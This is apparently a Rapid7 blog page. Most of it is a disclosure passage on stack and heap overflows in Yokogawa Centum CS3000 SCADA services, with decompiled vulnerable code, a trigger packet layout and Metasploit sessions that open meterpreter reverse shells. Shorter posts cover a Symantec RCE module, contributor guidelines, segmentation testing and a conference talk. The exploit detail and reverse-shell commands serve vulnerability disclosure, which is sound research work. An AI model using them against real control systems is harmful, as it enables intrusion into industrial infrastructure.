00a9f77c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

00a9f78c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

 

Later, while processing this first packet, the stack is filled with the packet contents. It occurs when flushing the contents of the log:

 

.text:61DC1572 call ebx ; fflush ; Here is where the stack is filled with controlled data
.text:61DC1572 ;
.text:61DC1572 ; ChildEBP RetAddr Args to Child
.text:61DC1572 ; 00a9fab8 77c3035a 00000003 005c4298 000003e0 msvcrt!_write_lk+0xd6
.text:61DC1572 ; 00a9faf4 77c3edb2 00000003 005c4298 000003e0 msvcrt!_write+0x57
.text:61DC1572 ; 00a9fb14 77c3edf3 77c5fce0 00000000 00a9fb58 msvcrt!_flush+0x35
.text:61DC1572 ; 00a9fb24 77c3ef26 77c5fce0 77c40ed3 7c802530 msvcrt!_fflush_lk+0xf
.text:61DC1572 ; 00a9fb58 61dc1574 77c5fce0 00a9fb84 77c5fce0 msvcrt!fflush+0x30
.text:61DC1572 ; WARNING: Stack unwind information not available. Following frames may be wrong.
.text:61DC1572 ; 00a9fb60 00a9fb84 77c5fce0 0089fc60 005c3eb8 libbkclogsvr!BKCLogSvrLibResume+0x3b4
















 

When the second packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy):

 

0:005> g

Breakpoint 0 hit

eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=005c53f8

eip=61dc16e3 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286

libbkclogsvr!BKCLogSvrLibResume+0x523:

61dc16e3 8d7c2410 lea edi,[esp+10h]

0:004> t

eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=00a9f71c

eip=61dc16e7 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286

libbkclogsvr!BKCLogSvrLibResume+0x527:

61dc16e7 33c0 xor eax,eax

0:004> db edi

00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 42 42 SOURCEBBBBBBBBBB

00a9f72c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f73c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f74c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f75c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f76c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f77c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

00a9f78c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

0:004> g

(430.f50): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\LibBKCCommon.dll -

eax=00000000 ebx=00000104 ecx=ffffffff edx=00a9f3ec esi=00a9fa60 edi=42424242

eip=61e51708 esp=00a9f3d8 ebp=005c5248 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286

LibBKCCommon!BKCGetLogDir+0x78:

61e51708 f2ae repne scas byte ptr es:[edi]

 

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

 

The vulnerability exists in the function “sub_41EB60” (IDA notation), which makes an insecure memory copy, while reading lines from user controlled input:

 

int __cdecl vulnerable_sub_41EB60(int a1, int a2)
{
  int v2; // eax@1
  char v3; // cl@1
  int result; // eax@3
  int i; // edx@5


  v2 = a2;
  v3 = *(_BYTE *)a2;
  if ( *(_BYTE *)a2 != ':' || *(_BYTE *)(a2 + 1) != ':' )
  {
    for ( i = 0; v3 != '\n'; ++v2 ) // Dangerous loop, copying data to a stack buffer, until an end of line is found
    {
      if ( v3 == '\r' )
        break;
      *(_BYTE *)(i + a1) = v3; // Byte copy to the stack, without having destination size into account.
      v3 = *(_BYTE *)(v2 + 1);
      ++i;
    }
    *(_BYTE *)(i + a1) = 0;
    for ( result = v2 + 1; *(_BYTE *)result == '\n' || *(_BYTE *)result == '\r'; ++result )
      ;
  }
  else
  {
    result = 0;
  }
  return result;
}












 

The dangerous loop keeps copying data from the buffer pointed by the second argument, to the buffer pointed by the first argument, until a delimiter "\r" or "\n" is found.

By sending specially crafted data to the TCP/20171 port it’s possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data:

 

.text:0041DAAD                mov    eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes)
.text:0041DAB4                lea    ecx, [esp+2280h+var_1D14] ; static buffer size on the stack
.text:0041DABB                push    eax
.text:0041DABC                push    ecx
.text:0041DABD                call    vulnerable_sub_41EB60









 

It’s possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/20171. The packet must include a 16-byte fake header, where the bytes 4-7 allow setting an arbitrary data length:

 

header = "ABCD"                  # iMark

header << [data.length].pack("N") # Data length

header << "IJKL"                  # NumSet

header << "MN"                    # req

header << "OP"                    # Unknown

 

And the packet data, which can’t contain "\r", "\n" or ":"" characters in order to trigger memory corruption. The arbitrary data must be longer than the static buffer size on the stack, of course.

 

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow

 

The vulnerability exists on the function “sub_409EA0” (IDA notation), used while parsing several commands accepted for the BKBCopyD.exe TCP/20111 service. The vulnerable function tries to store a received command (and its argument) on memory. But it uses a dangerous vsprintf call to store a temporary copy of the full command on the stack, where the size of the buffer is no longer enough to store commands with long arguments:

 

int dangerous_sub_409EA0(int a1, const char *Format, ...)
{
  unsigned int v2; // edx@1
  int result; // eax@3
  char Dest; // [sp+8h] [bp-80h]@1
  va_list va; // [sp+94h] [bp+Ch]@1


  va_start(va, Format);
  vsprintf(&Dest, Format, va); // Dangerous vsprintf call
  v2 = strlen(&Dest);
  if ( (signed int)(dword_4230C0 + v2 + 1) > 1024 )
  {
    dword_4230C4 = (int)dword_4230C8;
    dword_4230C0 = 0;
  }
  strcpy((char *)dword_4230C4, &Dest);
  result = dword_4230C4 + v2 + 1;
  dword_4230C4 += v2 + 1;
  dword_4230C0 += v2 + 1;
  return result;
}















 

The vulnerable function is reachable through several commands which accept user provided arguments like:

 

  • STOR

 

.text:00405ED0                push    eax            ; Args
.text:00405ED1                push    offset aStorS  ; "STOR %s"
.text:00405ED6                push    ecx            ; int
.text:00405ED7                call    dangerous_sub_409EA0















 

  • RETR

 

.text:00405E1E                push    edx            ; Args
.text:00405E1F                push    offset aRetrS  ; "RETR %s"
.text:00405E24                push    esi            ; int
.text:00405E25                call    dangerous_sub_409EA0















 

  • PMODE

 

.text:004060A2                push    eax            ; Args
.text:004060A3                push    offset aPmodeS  ; "PMODE %s"
.text:004060A8                push    ecx            ; int
.text:004060A9                call    dangerous_sub_409EA0















 

  • ATTR

 

.text:004061D1                push    ecx            ; Args
.text:004061D2                push    offset aAttrS  ; "ATTR %s"
.text:004061D7                push    esi            ; int
.text:004061D8                call    dangerous_sub_409EA0















 

  • XATR

 

.text:0040627A                push    edx            ; Args
.text:0040627B                push    offset aXatrS  ; "XATR %s"
.text:00406280                push    esi            ; int
.text:00406281                call    dangerous_sub_409EA0















 

By sending specially crafted data to the TCP/20171 port it’s possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data:

 

.text:0041DAAD                mov    eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes)
.text:0041DAB4                lea    ecx, [esp+2280h+var_1D14] ; static buffer size on the stack
.text:0041DABB                push    eax
.text:0041DABC                push    ecx
.text:0041DABD                call    vulnerable_sub_41EB60















 

Metasploit Modules

 

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

 

A proof of concept Metasploit module to trigger the Denial Of Service condition has been developed. However, a successful exploitation of the heap overflow could lead to arbitrary code execution with SYSTEM privileges.

 

msf > use auxiliary/dos/scada/yokogawa_logsvr
msf auxiliary(yokogawa_logsvr) > set RHOST 192.168.172.133
RHOST => 192.168.172.133
set verbose truemsf auxiliary(yokogawa_logsvr) > set verbose true
verbose => true
msf auxiliary(yokogawa_logsvr) > run


[*] Sending 10 packets...
[*] Sending 1/10...
[*] Sending 2/10...
[*] Sending 3/10...
[*] Sending 4/10...
[*] Sending 5/10...
[*] Sending 6/10...
[*] Sending 7/10...
[*] Sending 8/10...
[*] Sending 9/10...
[*] Sending 10/10...
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_logsvr


) > 














 

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

 

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 (including DEP bypass in case needed), where is possible to gain arbitrary code execution, with the CENTUM user privileges, by corrupting the SEH handler stored in the stack. By default, a run of the Metasploit module will return a shell on the targeted system:

 

msf > use exploit/windows/scada/yokogawa_bkhodeq_bof
msf exploit(yokogawa_bkhodeq_bof) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(yokogawa_bkhodeq_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(yokogawa_bkhodeq_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(yokogawa_bkhodeq_bof) > exploit


[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ], sending 8689 bytes...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1185) at 2014-03-09 16:09:28 +0100


meterpreter > getuid
Server username: HIS0163\CENTUM
meterpreter > sysinfo
Computer        : HIS0163
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter    : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...









 

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow

 

Exploitation has been confirmed at least with the commands STOR, RETR and PMODE. By sending a command with a long argument it’s possible to overflow the EIP saved on the stack and gain code execution since there isn’t stack cookie protection on the vulnerable function. A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50, where is possible to gain arbitrary code execution, with the CENTUM user privileges, by sending a specially crafted RETR command. Again, shells are to be had:

 

msf> use exploit/windows/scada/yokogawa_bkbcopyd_bof
msf exploit(yokogawa_bkbcopyd_bof) > set RHOST 192.168.172.133
RHOST => 192.168.172.133
msf exploit(yokogawa_bkbcopyd_bof) > check
[*] The target service is running, but could not be validated.
msf exploit(yokogawa_bkbcopyd_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(yokogawa_bkbcopyd_bof) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(yokogawa_bkbcopyd_bof) > exploit


[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 458 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1384) at 2014-03-03 12:20:54 -0600


meterpreter > getuid
Server username: HIS0163\CENTUM
meterpreter > sysinfo
Computer        : HIS0163
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter    : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


[*] 192.168.172.133 - Meterpreter session  cosed.  Reason: User exit














 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Attacking Security Infrastructure

This week, one module stands out for me: the Symantec Endpoint Protection Manager Remote Command Execution by xistence, who built on the proof-of-concept code from Chris Graham, who turned that out after Stefan Viehbock's disclosure from last week. You can read the full disclosure text from SEC Consult Vulnerability Lab, and get an idea of the scope of this thing. But, here's the TL;dr: attackers who can communicate with Symantec's Endpoint Protection Manager can turn this central management server into a command-and-control node of an entirely coopted botnet. Pretty good find for an on-site penetration tester... or a disgruntled employee.

 

Obviously, this is kind of a big deal, and while I don't want to beat up on Symantec (too much), this is the kind of catastrophic failure condition that makes people (rightfully) sketchy about their add-on security infrastructure. This is not just a story about a security vulnerability in some server-side component; it's a story about a security vulnerability in a product designed to manage the security posture of an organization.

 

On top of this, the vulnerability disclosure happened to be released over RSA week. You can be sure there was much schadenfreude to be had on the expo floor.

 

As a handler of vulnerability data, I'm also really digging this module's backstory, since it highlights the effectiveness of reasonable disclosure. Kudos to SEC Consult for disclosing this to Symantec back in December, and kudos to Symantec for not doing too much foot-dragging on getting a fix out in a reasonable amount of time. While the effects of the vulnerabilities in question are pretty much total disaster, this is a story with a happy ending: The vulnerability was uncovered, reported to the vendor and various CERTs, a fix was released, and a Metasploit module showed up to validate the fixes, all in the space of a little more than two months.

 

Oh, and if it's not obvious to you by now: if you have this product environment, you need to patch this thing YESTERDAY.

 

Contributing to Security Infrastructure

In Metasploit development news, we just refreshed our own CONTRIBUTING.md file for (as you might expect) Metasploit Contributors. I don't remember the last time we were below 60 outstanding pull requests, which kind of sucks. We generate more than our share of sore feelings about leaving some pull requests out there to rot, and that troubles me, personally, a lot. Like, a lot a lot. With this update from William Vu, we've laid down some some mostly common sense advice for folks who want to contribute meaningfully to the Metasploit Framework.

 

These "rules" are absolutely not set in stone. They may be crazy stupid and overly fascist. All we are trying to do here is to set up you, the open source security practitioner, for a pleasant experience with our backlog and ultimately a successful contribution.

 

However, if this misses the mark, then by Shuckins' beard, let us know how we can improve. Turns out, the best part of encoding our rulesy desires in CONTRIBUTING.md is that suggestions for changes are but a Pull Request away; so if you want to see something changed in that policy doc, change it how you'd like to see it and we can talk about it on the PR issue.

 

It's like democracy, but with forks and branches and pulls and stuff. I kinda wish real-world legislation worked this way.

 

Metasploit at RootedCon

If you happen to be in the vicinity of Madrid, and, you know, didn't have any plans, you should swing by RootedCon and see Metasploit's own Juan Vazquez and Julian Villas kick the stuffing out of some SCADA gear. Really, you should go, even if you already had something else planned. I hear that @corelanc0d3r is giving his mighty training at RootedCon as well, which is chock full of revealed wisdom about Metasploit exploit dev.

 

I'm jealous.

 

New Modules

This week's release has five new modules including the lolsy Symantec issue mentioned above.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 7-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already usign Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

network-segmentation-testing.png

Network segmentation is the act of splitting a computer network into subnetworks, each being a network segment, which increases security and can also boost performance. It is a security best practice that is recommended (but not required) by PCI DSS and it makes the top 20 list of critical security controls suggested by SANS. Due to the ongoing investigation, the world doesn't have the full details on the Target breach yet, but there are strong indications that network segmentation could have considerably reduced the impact of that breach.

 

It appears that the attackers entered through an HVAC company that supplied heating/cooling systems to Target stores. While it was first speculated that this external  partner had remote access to the HVAC systems for maintenance, it was later disclosed that it was their EDI/Billing integration that turned out to be Target's soft spot.

 

While network segmentation cannot help you keeping attackers out, it can help you contain the impact of a breach to one part of the network. With solid network segmentation between the billing and the POS systems, Target may have avoided the attackers from reaching their pot of gold - the POS systems.


To help our customers audit if their network segmentation is effective, we are updating Metasploit Pro to test the connection between any two network segments, testing open ports between the Metasploit Pro instance and a network segmentation testing server.


In addition to this very quick and easy network segmentation test, you can use Metasploit Pro to conduct a penetration test from any network segment and try to reach another, such as the cardholder data environment (CDE). Metasploit Pro's VPN pivoting can help you traverse network segments connected by multi-homed machines.


The new Network Segmentation Testing MetaModule will be available soon - watch this space!

First of all let me share with all you, I'm really excited to write this blog post! This week RootedCON 2014 will be happening in Spain and we got a talk accepted with @julianvilas! The talk's title is not very self-explanatory: "Kicking SCADA Around." So, in case you are interested in attending here is a little more information about the presentation.

 

We plan to share with the audience our experience while dissecting a widely used SCADA product (the product's name won't be disclosed until the talk!). Some interesting points we will speak on include:

 

  • How we managed to work together while living at more than 5,000 miles apart. We plan to share with you the time invested, tools and work methodology used to make this happen!
  • The SCADA "learning" experience. Honestly, when you're in front of a SCADA (project designer) product, it's not like sit down in front of a browser explorer, an instant messaging application, or an IDE for first time! The learning curve is hard, and we plan to share our experience!
  • Of course, we'll be speaking about reversing, vulnerability discovery, exploiting, and disclosure. In case you're asking, yes, we'll be giving details about new vulnerabilities and publishing exploits. Expect live Metasploit demos!
  • As Carlos Perez used to say: "the shell is only the beginning", and that's true! We'll be reviewing some post-exploitation techniques available with Meterpreter in order to maximize fun and profit in SCADA environments!
  • Finally, but not least, one thing we asked ourselves was: "Does our work matter to the world?" We tried to answer ourselves and we'll be sharing our conclusions with you. At the moment we just will say: #ScanAllTheThings!

 

In case you are planning to attend RootedCON, hope to see you there! On the other hand, if you're around, please stop and say "hola!" If you would like to share conversation and ideas about information security, Metasploit, vulnerabilities, exploiting or something else! See you in Madrid soon!

Filter Blog

By date: By tag: